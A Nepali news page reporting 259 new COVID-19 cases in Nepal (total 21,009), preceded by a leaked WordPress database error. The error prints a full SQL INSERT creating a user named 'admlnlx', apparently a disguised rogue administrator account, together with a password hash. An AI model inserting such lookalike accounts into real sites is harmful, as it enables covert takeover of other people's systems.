WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BEtZ/BlhleRlE3.Lvwp5M3rd6mKVRK.', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-06 13:12:22', '', 'admlnlx', 'admlnlx')
गाउँले न्युज, काठमाडौँ । नेपालमा पछिल्लो समय कोरोना भाइरस (कोभिड-१९) बाट थप २५९ जना संक्रमित थपिएका छन् । याेसँगै नेपालमा कोरोना संक्रमितको संख्या २१ हजार ९ पुगेकाे छ ।
मंगलबार (आज) स्वास्थ्य तथा जनसंख्या मन्त्रालयका प्रवक्ता डा. जागेश्वर गौतमले नियमित प्रेस ब्रिफिङका क्रममा यसको पुष्टि गरेका हुन् ।